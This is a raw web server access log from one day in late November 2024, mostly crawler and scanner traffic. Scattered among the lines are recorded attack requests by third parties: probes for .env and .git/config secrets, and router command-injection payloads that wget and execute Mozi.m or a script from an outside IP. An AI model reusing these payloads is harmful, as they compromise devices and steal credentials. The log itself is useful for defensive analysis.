87.120.113.56 - - [30/Nov/2024:11:58:48 +0100] "GET /.env HTTP/1.1" 404 280 "-" "Mozilla/5.0 (Linux; Android 9; SM-A705GM) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.143 Mobile Safari/537.36"
156.59.198.136 - - [30/Nov/2024:12:01:24 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202010060803_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
141.98.7.248 - - [30/Nov/2024:12:02:24 +0100] "CONNECT 1.1.1.1:443 HTTP/1.1" 200 423 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36"
141.98.7.248 - - [30/Nov/2024:12:02:25 +0100] "CONNECT 1.1.1.1:443 HTTP/1.1" 200 423 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36"
141.98.7.248 - - [30/Nov/2024:12:02:27 +0100] "CONNECT 1.1.1.1:443 HTTP/1.1" 200 423 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36"
156.59.198.136 - - [30/Nov/2024:12:05:23 +0100] "GET /ed.activities.at/stats/lang/awstats-ua.txt HTTP/1.0" 404 304 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
95.214.53.205 - - [30/Nov/2024:12:16:20 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
46.19.138.234 - - [30/Nov/2024:12:16:34 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
104.209.35.237 - - [30/Nov/2024:12:26:24 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 zgrab/0.x"
156.59.198.135 - - [30/Nov/2024:12:33:00 +0100] "GET /renault.activities.at/htdocs/dompdf-master/www/test/images/png/rgba8_bk.png HTTP/1.0" 404 327 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
180.111.14.143 - - [30/Nov/2024:12:34:19 +0100] "GET / HTTP/1.1" 200 423 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
156.59.198.135 - - [30/Nov/2024:12:48:50 +0100] "GET /ed.activities.at/stats/lang/awstats-pl.txt HTTP/1.0" 404 304 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [30/Nov/2024:13:24:51 +0100] "GET /ed.activities.at/stats/lang/awstats-jp.txt HTTP/1.0" 404 304 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [30/Nov/2024:13:28:51 +0100] "GET /docs/ecommlogistics/belege/GS16-000001.PDF HTTP/1.0" 404 306 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [30/Nov/2024:13:32:52 +0100] "GET /ed.activities.at/stats/lang/awstats-nb.txt HTTP/1.0" 404 304 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [30/Nov/2024:13:36:51 +0100] "GET /ed.activities.at/stats/lang/awstats-gl.txt HTTP/1.0" 404 304 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [30/Nov/2024:13:40:52 +0100] "GET /renault.activities.at/htdocs/binaries/10085151.pdf HTTP/1.0" 404 310 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [30/Nov/2024:13:44:52 +0100] "GET /renault.activities.at/htdocs/dompdf-master/www/test/images/png/resultgb.gif HTTP/1.0" 404 327 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
95.214.55.79 - - [30/Nov/2024:13:46:39 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
156.59.198.136 - - [30/Nov/2024:13:48:52 +0100] "GET /ed.activities.at/stats/lang/awstats-lv.txt HTTP/1.0" 404 304 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [30/Nov/2024:13:52:53 +0100] "GET /renault.activities.at/htdocs/binaries/10444274.pdf HTTP/1.0" 404 311 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [30/Nov/2024:14:12:55 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202003091803_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
154.213.192.4 - - [30/Nov/2024:14:18:32 +0100] "POST /boaform/admin/formLogin HTTP/1.1" 404 293 "http://212.69.160.11:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
87.120.125.126 - - [30/Nov/2024:14:33:04 +0100] "GET /.env HTTP/1.1" 404 280 "-" "Mozilla/5.0 (Linux U; en-US) AppleWebKit/528.5 (KHTML, like Gecko, Safari/528.5 ) Version/4.0 Kindle/3.0 (screen 600x800; rotate)"
95.163.84.18 - - [30/Nov/2024:14:45:09 +0100] "GET / HTTP/1.0" 200 423 "-" "masscan/1.3 (https://github.com/robertdavidgraham/masscan)"
185.224.128.17 - - [30/Nov/2024:14:46:57 +0100] "CONNECT example.com:80 HTTP/1.1" 200 423 "-" "-"
156.59.198.135 - - [30/Nov/2024:14:57:56 +0100] "GET /ed.activities.at/stats/lang/awstats-se.txt HTTP/1.0" 404 303 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
95.214.53.202 - - [30/Nov/2024:15:12:21 +0100] "GET / HTTP/1.1" 200 423 "-" "-"
47.128.28.66 - - [30/Nov/2024:15:13:31 +0100] "GET /robots.txt HTTP/1.1" 404 292 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
159.223.211.65 - - [30/Nov/2024:15:14:59 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36"
159.223.211.65 - - [30/Nov/2024:15:14:59 +0100] "GET /activities.ico HTTP/1.1" 200 1406 "http://coffeenostra.castlegem.co.uk/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36"
159.223.211.65 - - [30/Nov/2024:15:14:59 +0100] "GET /ads.txt HTTP/1.1" 404 293 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36"
114.34.166.158 - - [30/Nov/2024:15:15:03 +0100] "GET / HTTP/1.0" 200 423 "-" "Mozilla/5.0 (Linux; U; Android 4.0.3; ko-kr; LG-L160L Build/IML74K) AppleWebkit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30"
47.128.112.38 - - [30/Nov/2024:15:17:32 +0100] "GET /robots.txt HTTP/1.1" 404 292 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
47.128.38.172 - - [30/Nov/2024:15:21:34 +0100] "GET /robots.txt HTTP/1.1" 404 292 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [30/Nov/2024:15:24:40 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202009171403_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
47.128.117.132 - - [30/Nov/2024:15:25:31 +0100] "GET /robots.txt HTTP/1.1" 404 292 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [30/Nov/2024:15:28:41 +0100] "GET /renault.activities.at/htdocs/binaries/10015817.pdf HTTP/1.0" 404 311 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [30/Nov/2024:15:32:41 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202005071203_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
128.199.164.57 - - [30/Nov/2024:15:40:37 +0100] "GET /activities.ico HTTP/1.1" 200 1406 "-" "Go-http-client/1.1"
120.85.142.18 - - [30/Nov/2024:15:47:49 +0100] "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 HTTP/1.0" 404 364 "-" "-"
205.210.31.183 - - [30/Nov/2024:15:50:12 +0100] "GET / HTTP/1.1" 200 423 "-" "-"
185.7.78.88 - - [30/Nov/2024:15:52:52 +0100] "GET / HTTP/1.1" 200 274 "http://212.69.160.11:80/left.html" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:77.0) Gecko/20100101 Firefox/77.0"
40.85.157.107 - - [30/Nov/2024:16:04:05 +0100] "MGLNDD_212.69.160.11_80" 400 383 "-" "-"
156.59.198.135 - - [30/Nov/2024:16:05:51 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202101080903_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [30/Nov/2024:16:09:51 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202002121803_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
67.205.187.185 - - [30/Nov/2024:16:12:16 +0100] "\x16\x03\x01" 400 383 "-" "-"
67.205.187.185 - - [30/Nov/2024:16:12:16 +0100] "\x16\x03\x01" 400 383 "-" "-"
67.205.187.185 - - [30/Nov/2024:16:12:16 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
67.205.187.185 - - [30/Nov/2024:16:12:17 +0100] "GET /form.html HTTP/1.1" 404 283 "-" "curl/8.1.2"
67.205.187.185 - - [30/Nov/2024:16:12:17 +0100] "GET /upl.php HTTP/1.1" 404 282 "-" "Mozilla/5.0"
67.205.187.185 - - [30/Nov/2024:16:12:17 +0100] "GET /t4 HTTP/1.1" 404 278 "-" "Mozilla/5.0"
67.205.187.185 - - [30/Nov/2024:16:12:17 +0100] "GET /geoip/ HTTP/1.1" 404 281 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
67.205.187.185 - - [30/Nov/2024:16:12:18 +0100] "GET /favicon.ico HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
67.205.187.185 - - [30/Nov/2024:16:12:18 +0100] "GET /1.php HTTP/1.1" 404 280 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
67.205.187.185 - - [30/Nov/2024:16:12:18 +0100] "GET /systembc/password.php HTTP/1.1" 404 291 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
67.205.187.185 - - [30/Nov/2024:16:12:18 +0100] "GET /password.php HTTP/1.1" 404 285 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
156.59.198.135 - - [30/Nov/2024:16:13:51 +0100] "GET /ed.activities.at/stats/lang/awstats-sk.txt HTTP/1.0" 404 304 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
64.62.197.104 - - [30/Nov/2024:16:16:57 +0100] "\x16\x03\x01" 400 383 "-" "-"
156.59.198.136 - - [30/Nov/2024:16:17:51 +0100] "GET /renault.activities.at/htdocs/binaries/10069856.pdf HTTP/1.0" 404 311 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
194.50.16.198 - - [30/Nov/2024:16:21:58 +0100] "GET /login.asp HTTP/1.1" 404 354 "-" "-"
80.82.77.202 - - [30/Nov/2024:16:39:56 +0100] "GET / HTTP/1.0" 200 423 "-" "Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36"
38.46.220.87 - - [30/Nov/2024:16:43:40 +0100] "CONNECT www.baidu.com:443 HTTP/1.1" 200 423 "-" "Go-http-client/1.1"
95.214.53.202 - - [30/Nov/2024:16:44:51 +0100] "GET / HTTP/1.1" 200 423 "-" "-"
156.59.198.135 - - [30/Nov/2024:16:58:58 +0100] "GET /renault.activities.at/htdocs/binaries/10331571.pdf HTTP/1.0" 404 312 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
185.242.226.10 - - [30/Nov/2024:17:03:54 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36"
156.59.198.136 - - [30/Nov/2024:17:07:10 +0100] "GET /hausegger.activities.at/stats/lang/awstats-ko.txt HTTP/1.0" 404 309 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
183.207.45.110 - - [30/Nov/2024:17:43:02 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36"
183.207.45.110 - - [30/Nov/2024:17:43:03 +0100] "GET /activities.ico HTTP/1.1" 200 1406 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36"
185.224.128.67 - - [30/Nov/2024:17:43:59 +0100] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+-O-+http%3A%2F%2F154.216.19.215%2Ft%7Csh%3B%60) HTTP/1.1" 404 371 "-" "Go-http-client/1.1"
80.82.77.202 - - [30/Nov/2024:17:45:17 +0100] "\x16\x03\x02\x01o\x01" 400 383 "-" "-"
156.59.198.136 - - [30/Nov/2024:17:47:13 +0100] "GET /renault.activities.at/htdocs/binaries/10462863.pdf HTTP/1.0" 404 312 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [30/Nov/2024:17:51:13 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/201910280903_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
194.50.16.198 - - [30/Nov/2024:17:53:03 +0100] "POST /boaform/admin/formLogin HTTP/1.1" 404 293 "http://212.69.160.11:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
156.59.198.135 - - [30/Nov/2024:17:55:14 +0100] "GET /ed.activities.at/stats/lang/awstats-eu.txt HTTP/1.0" 404 304 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
87.120.112.187 - - [30/Nov/2024:18:13:37 +0100] "GET /.env HTTP/1.1" 404 280 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Whale/1.5.75.9 Safari/537.36"
179.43.163.250 - - [30/Nov/2024:18:15:17 +0100] "\x16\x03\x01" 400 383 "-" "-"
179.43.163.250 - - [30/Nov/2024:18:15:17 +0100] "GET / HTTP/1.1" 400 383 "-" "-"
179.43.163.250 - - [30/Nov/2024:18:15:17 +0100] "GET / HTTP/1.1" 200 423 "-" "l9tcpid/v1.1.0"
179.43.163.250 - - [30/Nov/2024:18:15:17 +0100] "GET /prod/.env HTTP/1.1" 404 283 "-" "l9explore/1.2.2"
179.43.163.250 - - [30/Nov/2024:18:15:17 +0100] "GET /backup/.git/config HTTP/1.1" 404 291 "-" "l9explore/1.2.2"
179.43.163.250 - - [30/Nov/2024:18:15:17 +0100] "GET /src/.git/config HTTP/1.1" 404 288 "-" "l9explore/1.2.2"
179.43.163.250 - - [30/Nov/2024:18:15:18 +0100] "GET /.env.docker-compose HTTP/1.1" 404 291 "-" "l9explore/1.2.2"
179.43.163.250 - - [30/Nov/2024:18:15:18 +0100] "GET /server/.git/config HTTP/1.1" 404 288 "-" "l9explore/1.2.2"
179.43.163.250 - - [30/Nov/2024:18:15:18 +0100] "GET /static../.git/config HTTP/1.1" 404 291 "-" "l9explore/1.2.2"
179.43.163.250 - - [30/Nov/2024:18:15:18 +0100] "GET /config/.git/config HTTP/1.1" 404 288 "-" "l9explore/1.2.2"
179.43.163.250 - - [30/Nov/2024:18:15:18 +0100] "GET /docker-compose.prod.yml HTTP/1.1" 404 294 "-" "l9explore/1.2.2"
179.43.163.250 - - [30/Nov/2024:18:15:18 +0100] "GET /.env.dist HTTP/1.1" 404 283 "-" "l9explore/1.2.2"
179.43.163.250 - - [30/Nov/2024:18:15:18 +0100] "GET /.env.docker HTTP/1.1" 404 285 "-" "l9explore/1.2.2"
156.59.198.135 - - [30/Nov/2024:18:20:02 +0100] "GET /ed.activities.at/stats/lang/awstats-tr.txt HTTP/1.0" 404 303 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [30/Nov/2024:18:24:02 +0100] "GET /renault.activities.at/htdocs/binaries/10661427.pdf HTTP/1.0" 404 311 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
47.128.56.56 - - [30/Nov/2024:18:28:04 +0100] "GET /robots.txt HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
47.128.39.191 - - [30/Nov/2024:18:32:04 +0100] "GET /robots.txt HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
47.128.22.94 - - [30/Nov/2024:18:36:02 +0100] "GET /robots.txt HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
47.128.39.34 - - [30/Nov/2024:18:40:03 +0100] "GET /robots.txt HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
179.43.133.122 - - [30/Nov/2024:18:40:54 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
42.224.183.73 - - [30/Nov/2024:18:43:45 +0100] "POST /GponForm/diag_Form?images/ HTTP/1.1" 404 286 "-" "Hello, World"
156.59.198.135 - - [30/Nov/2024:18:44:02 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202106300903_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [30/Nov/2024:18:48:44 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202012171103_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
141.98.11.35 - - [30/Nov/2024:18:48:50 +0100] "GET / HTTP/1.1" 200 423 "-" "-"
38.46.220.87 - - [30/Nov/2024:18:55:00 +0100] "CONNECT www.baidu.com:443 HTTP/1.1" 200 423 "-" "Go-http-client/1.1"
93.174.93.12 - - [30/Nov/2024:18:58:15 +0100] "\x16\x03\x02\x01o\x01" 400 383 "-" "-"
194.38.23.16 - - [30/Nov/2024:19:02:45 +0100] "GET /wp-content/plugins/videowhisper-video-presentation/vp/translation.php HTTP/1.1" 404 421 "-" "ALittle Client"
194.38.23.16 - - [30/Nov/2024:19:02:53 +0100] "GET /wp-content/plugins/videowhisper-video-presentation/vp/translation.php HTTP/1.1" 404 434 "-" "ALittle Client"
59.126.80.9 - - [30/Nov/2024:19:09:09 +0100] "GET / HTTP/1.0" 200 423 "-" "Mozilla/5.0 (Linux; U; Android 4.0.3; ko-kr; LG-L160L Build/IML74K) AppleWebkit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30"
154.213.187.20 - - [30/Nov/2024:19:10:40 +0100] "GET / HTTP/1.1" 200 274 "-" "Linux Gnu (cow)"
156.59.198.136 - - [30/Nov/2024:19:11:12 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/201909051203_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
94.102.49.190 - - [30/Nov/2024:19:13:15 +0100] "GET / HTTP/1.1" 200 423 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36"
94.102.49.190 - - [30/Nov/2024:19:13:15 +0100] "GET /robots.txt HTTP/1.1" 404 355 "-" "-"
94.102.49.190 - - [30/Nov/2024:19:13:16 +0100] "GET /sitemap.xml HTTP/1.1" 404 356 "-" "-"
94.102.49.190 - - [30/Nov/2024:19:13:16 +0100] "GET /.well-known/security.txt HTTP/1.1" 404 369 "-" "-"
94.102.49.190 - - [30/Nov/2024:19:13:18 +0100] "GET /activities.ico HTTP/1.1" 200 1406 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36"
46.19.138.234 - - [30/Nov/2024:19:13:18 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
156.59.198.136 - - [30/Nov/2024:19:15:12 +0100] "GET /renault.activities.at/htdocs/binaries/10279334.pdf HTTP/1.0" 404 312 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [30/Nov/2024:19:19:13 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202105271203_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [30/Nov/2024:19:23:13 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202010301303_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [30/Nov/2024:19:27:13 +0100] "GET /ed.activities.at/stats/lang/awstats-cy.txt HTTP/1.0" 404 304 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [30/Nov/2024:19:31:12 +0100] "GET /ed.activities.at/stats/lang/awstats-en.txt HTTP/1.0" 404 303 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [30/Nov/2024:19:52:19 +0100] "GET /renault.activities.at/htdocs/import/werbung.csv HTTP/1.0" 404 309 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [30/Nov/2024:20:05:49 +0100] "GET /renault.activities.at/htdocs/binaries/10267576.pdf HTTP/1.0" 404 312 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [30/Nov/2024:20:10:27 +0100] "GET /renault.activities.at/htdocs/binaries/10197031.doc HTTP/1.0" 404 311 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [30/Nov/2024:20:19:26 +0100] "GET /ed-test.2web.at/stats/lang/awstats-he.txt HTTP/1.0" 404 302 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
